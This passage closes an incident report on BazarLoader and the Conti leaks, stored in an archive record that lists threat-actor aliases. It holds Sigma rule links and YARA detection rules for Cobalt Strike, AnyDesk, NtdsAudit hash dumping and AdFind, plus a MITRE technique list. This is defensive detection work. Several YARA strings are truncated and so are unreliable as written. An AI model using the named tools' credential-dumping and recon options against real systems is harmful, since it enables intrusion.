–\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_svchost.yml\r\nRclone Execution via Command Line or PowerShell –\r\nhttps://gist.github.com/beardofbinary/fede0607e830aa1add8deda3d59d9a77#file-rclone_execution-yaml\r\nDNS Query for MEGA.io Upload Domain –\r\nhttps://gist.github.com/beardofbinary/d46c3b4e37ba8b21a79a63fbf69c6411#file-mega_dns_lookup-yaml\r\nYara\r\nrule informational_AnyDesk_Remote_Software_Utility {\r\n meta:\r\n description = \"files - AnyDesk.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"9eab01396985ac8f5e09b74b527279a972471f4b97b94e0a76d7563cf27f4d57\"\r\n strings:\r\n $x1 = \"C:\\\\Buildbot\\\\ad-windows-32\\\\build\\\\release\\\\app-32\\\\win_loader\\\\AnyDesk.pdb\" fullword ascii\r\n $s2 = \"release/win_6.3.x\" fullword ascii\r\n $s3 = \"16eb5134181c482824cd5814c0efd636\" fullword ascii\r\n $s4 = \"b1bfe2231dfa1fa4a46a50b4a6c67df34019e68a\" fullword ascii\r\n $s5 = \"Z72.irZ\" fullword ascii\r\n $s6 = \"ysN.JTf\" fullword ascii\r\n $s7 = \",;@O:\\\"\" fullword ascii\r\n $s8 = \"ekX.cFm\" fullword ascii\r\n $s9 = \":keftP\" fullword ascii\r\n $s10 = \"\u003eFGirc\" fullword ascii\r\n $s11 = \"\u003e-9 -D\" fullword ascii\r\n $s12 = \"% /m_v?\" fullword ascii\r\n $s13 = \"?\\\\+ X5\" fullword ascii\r\n $s14 = \"Cyurvf7\" fullword ascii\r\n $s15 = \"~%f_%Cfcs\" fullword ascii\r\n $s16 = \"wV^X(P+ \" fullword ascii\r\n $s17 = \"\\\\Ej0drBTC8E=oF\" fullword ascii\r\n $s18 = \"W00O~AK_=\" fullword ascii\r\n $s19 = \"D( -m}w\" fullword ascii\r\n $s20 = \"avAoInJ1\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 11000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule cobalt_strike_dll21_5426 {\r\n meta:\r\n description = \"files - 21.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"96a74d4c951d3de30dbdaadceee0956682a37fcbbc7005d2e3bbd270fbd17c98\"\r\n strings:\r\n $s1 = \"AWAVAUATVWUSH\" fullword ascii\r\n $s2 = \"UAWAVVWSPH\" fullword ascii\r\n $s3 = \"AWAVAUATVWUSPE\" fullword ascii\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 18 of 21\n\n$s4 = \"UAWAVATVWSH\" fullword ascii\r\n $s5 = \"AWAVVWUSH\" fullword ascii\r\n $s6 = \"UAWAVAUATVWSH\" fullword ascii\r\n $s7 = \"AVVWSH\" fullword ascii\r\n $s8 = \"m1t6h/o*i-j2p2g7i0r.q6j3p,j2l2s7p/s9j-q0f9f,i7r2g1h*i8r5h7g/q9j4h*o7i4r9f7f3g*p/q7o1e5n8m1q4n.e+n0i*r/i*k2q-g\r\n $s9 = \"s-e6m/f-g*j.i8p1g6j*i,o1s9o5f8r-p1l1k4o9n9l-s7q8g+n,f4t0q,f6n9q5s5e6i-f*e6q-r6g8s1o6r0k+h6p9i4f6p4s6l,g0p1j6l\r\n $s10 = \"o1s1s9i2s.f1g5l6g5o2k8h*e9j2o3k0j1f+n,k9h5l*e8p*s2k5r3j-f5o-f,g+e*s-e9h7e.t0e-h3e2t1f8j5k/m9p6n/j3h9e1k3h.t6\r\n $s11 = \"k7s9g7m5k4s5o3h6k.s1p.h9k.s-o8e*f5n9r,l4f-s5k3p2f/n1r.i*f*n-p4s3e7m9p2t/e3m5g1s9e0m1q/j*e*m-r*i+h.p9s2f6h-p5\r\n $s12 = \"k9g9o0t1s4k*k*h.s-p-k.h-m1k*f4h0j7f6n,i5g-n3h+l3n1j7j0e*n5r6r-i9i/e1q4m6i3e2o8j9h9e0m.r-i9m*t4j/r.o*l8m4i.t5\r\n $s13 = \"s6k9n/j.s4s5g2p6s.k1t/j6s,s-g*p.n6f9m/g.n4n5j2q6n.f1p/g6n,n-j*q.m6e9o/h.m4m5i2r6m.e1p/h6m,m-i*r.p6h9m/e.p4p5\r\n $s14 = \"r4k7g8t-k4o6m,o1s1k.k1s6o,h8k-s4j8q*m+f/i*q/f3m-r5j2n0f0i*q0m/e0j5q7n5f4j7q3n7f1m4g2s,g5s5l9h7s9p1o.t8k5r-j3\r\n $s15 = \"k8s9n7o9k5s5o9m2k0s1m3m.k,s-n+o-f9n9t+t6f4n5o6t2f0n1s/r1f-n-o.t*e8m9i-s6e4m5t3q5e1m1i5s.e,m-k0s*h8p9q7t9h5p5\r\n $s16 = \"o9g6g0l0s1e6h4p-g6s9s9p1m1k*s3l-t5s.f8m5r5f6n+i2j8f*h,p5j2r.h0h1q9i6e8r-i*n8m-r5s-l.i8f2i1k.o4n1t9l6l0g,p9j6\r\n $s17 = \"t8n2i3e0i,l.i7i9e8r1j7o0n3i9j0m3m-l6e6s9r*l6s5h4t6n7o*k.r1f+r4l/q9g7i3o.m+t9q*g/j0h0e1n*m3i,h.e4n3i5n-r9g1h2\r\n $s18 = \"[_^A^A_]\" fullword ascii\r\n $s19 = \"k9s9f+j*k3s5o-j/k/s1h/p5k-s-o7j7f7n9t/g+f3n5q/r8f1n1t7g3f+n-p.g8e7m9s3q4e5m5o+h0e/m1g-h4e+m-m+q0h9p9f/e,h3p5\r\n $s20 = \"g8s9j0t4o,t+n3t1g0k9k1t,o5s0n+t9n6j+o0q2i4j6r1i3f,g+j2h1f2r1n-e9m,i2i7f3q4m-n7n4m.r.e1s*j,m5p/n0n6s8p9g/o7l3\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n 8 of them\r\n}\r\nimport \"pe\"\r\nrule cobalt_strike_exe21 {\r\n meta:\r\n description = \"files - 21.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"972e38f7fa4c3c59634155debb6fb32eebda3c0e8e73f4cb264463708d378c39\"\r\n strings:\r\n $s1 = \"%c%c%c%c%c%c%c%c%cMSSE-%d-server\" fullword ascii\r\n $s2 = \" VirtualQuery failed for %d bytes at address %p\" fullword ascii\r\n $s3 = \"1brrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrT\r\n $s4 = \"\\\\hzA\\\\Vza\\\\|z%\\\\2z/\\\\3z\\\"\\\\/z%\\\\/z8\\\\9z\\\"\\\\(zl\\\\3z\\\"\\\\9z4\\\\5z8\\\\|z.\\\\9z+\\\\5z\\\"\\\\qz)\\\\2z(\\\\|z:\\\\=z\u003e\\\\5z-\\\\\u003ez\r\n $s5 = \"\\\\zL\\\\/z\u003e\\\\qz.\\\\=za\\\\0z-\\\\(z\\\"\\\\\\\\zL\\\\/z\u003e\\\\qz?\\\\,za\\\\?z5\\\\.z \\\\\\\\zL\\\\/z\u003e\\\\qz?\\\\,za\\\\0z-\\\\(z\\\"\\\\\\\\zL\\\\/z:\\\\qz*\r\n $s6 = \"\\\\zL:\\\\zL\" fullword ascii\r\n $s7 = \"\\\\\\\\z:\\\\\\\\z\" fullword ascii\r\n $s8 = \"\\\\qz/\\\\3z!\\\\,z%\\\\0z)\\\\8zl\\\\tzc\\\\?z \\\\.ze\\\\|z*\\\\)z\\\"\\\\?z8\\\\5z#\\\\2zl\\\\:z\u003e\\\\3z!\\\\|z-\\\\|z\\\"\\\\=z8\\\\5z:\\\\9zl\\\\?z#\\\\\r\n $s9 = \"qz\u003c\\\\%zL\\\\\\\\zL\\\\9z?\\\\qz?\\\\*zL\\\\\\\\zL\\\\9z?\\\\qz9\\\\%zL\\\\\\\\zL\\\\9z?\\\\qz:\\\\9zL\\\\\\\\zL\\\\9z8\\\\qz)\\\\9zL\\\\\\\\zL\\\\9z9\\\\qz)\\\r\n $s10 = \"zL\\\\\\\\zL\\\\0z:\\\\qz\" fullword ascii\r\n $s11 = \"z-\\\\(z\\\"\\\\\\\\zL\\\\/z:\\\\qz\" fullword ascii\r\n $s12 = \" VirtualProtect failed with code 0x%x\" fullword ascii\r\n $s13 = \"3\\\\)z'\\\\\\\\zL\\\\\u003ez)\\\\\\\\zL\\\\/z \\\\\\\\zL\\\\9z8\\\\\\\\zL\\\\0z:\\\\\\\\zL\\\\0z8\\\\\\\\zL\\\\:z-\\\\\\\\zL\\\\*z%\\\\\\\\zL\\\\4z5\\\\\\\\zL\\\\=z6\\\\\\\r\n $s14 = \"z#\\\\\\\\zL\\\\,z \\\\\\\\zL\\\\,z8\\\\\\\\zL\\\\.z#\\\\\\\\zL\\\\.z9\\\\\\\\zL\\\\4z\u003e\\\\\\\\zL\\\\/z'\\\\\\\\zL\\\\/z=\\\\\\\\zL\\\\/z:\\\\\\\\zL\\\\(z$\\\\\\\\zL\\\r\n $s15 = \"qz \\\\5zL\\\\\\\\zL\\\\8z)\\\\qz \\\\)zL\\\\\\\\zL\\\\8z%\\\\*za\\\\1z:\\\\\\\\zL\\\\9z \\\\qz+\\\\.zL\\\\\\\\zL\\\\9z\\\"\\\\qz-\\\\)zL\\\\\\\\zL\\\\9z\\\"\\\\q\r\n $s16 = \"qz\u003c\\\\7zL\\\\\\\\zL\\\\)z6\\\\qz9\\\\\u0026za\\\\?z5\\\\.z \\\\\\\\zL\\\\)z6\\\\qz9\\\\\u0026za\\\\0z-\\\\(z\\\"\\\\\\\\zL\\\\*z%\\\\qz:\\\\2zL\\\\\\\\zL\\\\$z$\\\\qz6\r\n $s17 = \"qz'\\\\.zL\\\\\\\\zL\\\\7z5\\\\qz'\\\\;zL\\\\\\\\zL\\\\0z8\\\\qz \\\\(zL\\\\\\\\zL\\\\0z:\\\\qz \\\\*zL\\\\\\\\zL\\\\1z%\\\\qz\\\"\\\\\u0026zL\\\\\\\\zL\\\\1z'\\\\qz\r\n $s18 = \"]zL\\\\=z*\\\\qz6\\\\=zL\\\\\\\\zL\\\\=z\u003e\\\\qz-\\\\9zL\\\\\\\\zL\\\\=z\u003e\\\\qz.\\\\4zL\\\\\\\\zL\\\\=z\u003e\\\\qz(\\\\\u0026zL\\\\\\\\zL\\\\=z\u003e\\\\qz)\\\\;zL\\\\\\\\zL\r\n $s19 = \" Unknown pseudo relocation protocol version %d.\" fullword ascii\r\n $s20 = \"\\\\L*L\\\\]qN\\\\WHKl]qO\\\\W{j\\\\XJL\\\\][G\\\\}\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 800KB and (pe.imphash()==\"17b461a082950fc6332228572138b80c\" or\r\n8 of them)\r\n}\r\nrule informational_NtdsAudit_AD_Audit_Tool {\r\n meta:\r\n description = \"files - NtdsAudit.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b\"\r\n strings:\r\n $x1 = \"WARNING: Use of the --pwdump option will result in decryption of password hashes using the System Key.\" fullw\r\n $s2 = \"costura.nlog.dll.compressed\" fullword wide\r\n $s3 = \"costura.microsoft.extensions.commandlineutils.dll.compressed\" fullword wide\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 19 of 21\n\n$s4 = \"Password hashes have only been dumped for the \\\"{0}\\\" domain.\" fullword wide\r\n $s5 = \"The NTDS file contains user accounts with passwords stored using reversible encryption. Use the --dump-revers\r\n $s6 = \"costura.system.valuetuple.dll.compressed\" fullword wide\r\n $s7 = \"TargetRNtdsAudit.NTCrypto.#DecryptDataUsingAes(System.Byte[],System.Byte[],System.Byte[])T\" fullword ascii\r\n $s8 = \"c:\\\\Code\\\\NtdsAudit\\\\src\\\\NtdsAudit\\\\obj\\\\Release\\\\NtdsAudit.pdb\" fullword ascii\r\n $s9 = \"NtdsAudit.exe\" fullword wide\r\n $s10 = \"costura.esent.interop.dll.compressed\" fullword wide\r\n $s11 = \"costura.costura.dll.compressed\" fullword wide\r\n $s12 = \"costura.registry.dll.compressed\" fullword wide\r\n $s13 = \"costura.nfluent.dll.compressed\" fullword wide\r\n $s14 = \"dumphashes\" fullword ascii\r\n $s15 = \"The path to output hashes in pwdump format.\" fullword wide\r\n $s16 = \"Microsoft.Extensions.CommandLineUtils\" fullword ascii\r\n $s17 = \"If you require password hashes for other domains, please obtain the NTDS and SYSTEM files for each domain.\"\r\n $s18 = \"microsoft.extensions.commandlineutils\" fullword wide\r\n $s19 = \"-p | --pwdump \u003cfile\u003e\" fullword wide\r\n $s20 = \"get_ClearTextPassword\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule informational_AdFind_AD_Recon_and_Admin_Tool {\r\n meta:\r\n description = \"files - AdFind.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682\"\r\n strings:\r\n $s1 = \" -sc dumpugcinfo Dump info for users/computers that have used UGC\" fullword ascii\r\n $s2 = \" -sc computers_pwdnotreqd Dump computers set with password not required.\" fullword ascii\r\n $s3 = \" -sc computers_inactive Dump computers that are disabled or password last set\" fullword ascii\r\n $s4 = \" -sc computers_active Dump computers that are enabled and password last\" fullword ascii\r\n $s5 = \" -sc ridpool Dump Decoded Rid Pool Info\" fullword ascii\r\n $s6 = \" Get top 10 quota users in decoded format\" fullword ascii\r\n $s7 = \" -po Print options. This switch will dump to the command line\" fullword ascii\r\n $s8 = \"ERROR: Couldn't properly encode password - \" fullword ascii\r\n $s9 = \" -sc users_accexpired Dump accounts that are expired (NOT password expiration).\" fullword ascii\r\n $s10 = \" -sc users_disabled Dump disabled users.\" fullword ascii\r\n $s11 = \" -sc users_pwdnotreqd Dump users set with password not required.\" fullword ascii\r\n $s12 = \" -sc users_noexpire Dump non-expiring users.\" fullword ascii\r\n $s13 = \" adfind -default -rb ou=MyUsers -objfilefolder c:\\\\temp\\\\ad_out\" fullword ascii\r\n $s14 = \" Dump all Exchange objects and their SMTP proxyaddresses\" fullword ascii\r\n $s15 = \"WLDAP32.DLL\" fullword ascii\r\n $s16 = \"AdFind.exe\" fullword ascii\r\n $s17 = \" duration attributes that will be decoded by the -tdc* switches.\" fullword ascii\r\n $s18 = \" -int8time- xx Remove attribute(s) from list to be decoded as int8. Semicolon delimited.\" fullword ascii\r\n $s19 = \"replTopologyStayOfExecution\" fullword ascii\r\n $s20 = \"%s: [%s] Error 0x%0x (%d) - %s\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\r\n 8 of them\r\n}\r\nMITRE\r\nPhishing – T1566\r\nSpearphishing Attachment – T1566.001\r\nDomain Accounts – T1078.002\r\nCommand and Scripting Interpreter – T1059\r\nUser Execution – T1204\r\nPowerShell – T1059.001\r\nWindows Command Shell – T1059.003\r\nMalicious File – T1204.002\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 20 of 21\n\nCreate Account – T1136\r\nValid Accounts – T1078\r\nLocal Account – T1087.001\r\nProcess Injection – T1055\r\nProcess Hollowing – T1055.012\r\nSigned Binary Proxy Execution – T1218\r\nRundll32 – T1218.011\r\nOS Credential Dumping – T1003\r\nLSASS Memory – T1003.001\r\nCached Domain Credentials – T1003.005\r\nDomain Trust Discovery – T1482\r\nAccount Discovery – T1087\r\nFile and Directory Discovery – T1083\r\nProcess Discovery – T1057\r\nNetwork Share Discovery – T1135\r\nRemote System Discovery – T1018\r\nSoftware Discovery – T1518\r\nSystem Owner/User Discovery – T1033\r\nSystem Time Discovery – T1124\r\nLateral Tool Transfer – T1570\r\nRemote Services – T1021\r\nRemote Desktop Protocol – T1021.001\r\nSMB/Windows Admin Shares – T1021.002\r\nWindows Remote Management – T1021.006\r\nData from Local System – T1005\r\nData from Network Shared Drive – T1039\r\nData Staged – T1074\r\nLocal Data Staging – T1074.001\r\nRemote Data Staging – T1074.002\r\nInternal case #5426\r\nSource: https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/" ], "report_names": [ "bazarloader-and-the-conti-leaks" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434522, "ts_updated_at": 1775792243, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/297f62e26c67ffacef5e08e21f9e227d2a2b19bd.pdf", "text": "https://archive.orkl.eu/297f62e26c67ffacef5e08e21f9e227d2a2b19bd.txt", "img": "https://archive.orkl.eu/297f62e26c67ffacef5e08e21f9e227d2a2b19bd.jpg" } }